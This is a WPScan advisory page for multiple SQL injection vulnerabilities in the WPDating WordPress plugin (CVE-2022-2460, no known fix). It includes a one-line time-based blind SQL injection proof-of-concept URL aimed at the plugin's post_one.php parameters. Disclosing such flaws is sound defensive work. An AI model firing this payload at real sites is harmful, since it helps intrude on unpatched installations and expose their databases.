WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WPDating <= 7.1.9 - Multiple SQL Injection Issues

Description

The plugin does not properly escape user input before concatenating it to certain SQL queries, leading to multiple SQL injection vulnerabilities.

Proof of Concept

http://vulnerable-site.tld/wp-content/plugins/dsp_dating/m1/post_one.php?sender_id=(sender_id*sleep(10))&receiver_id=(sender_id*sleep(10))

Affects Plugins

dsp_dating
No known fix

References

CVE
CVE-2022-2460

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

WPScanTeam

Submitter website
https://wpscan.com
Verified

Yes

WPVDB ID
694b6dfd-2424-41b4-8595-b6c305c390db

Timeline

Publicly Published

2022-07-18 (about 2 months ago)

Added

2022-07-18 (about 2 months ago)

Last Updated

2022-07-18 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin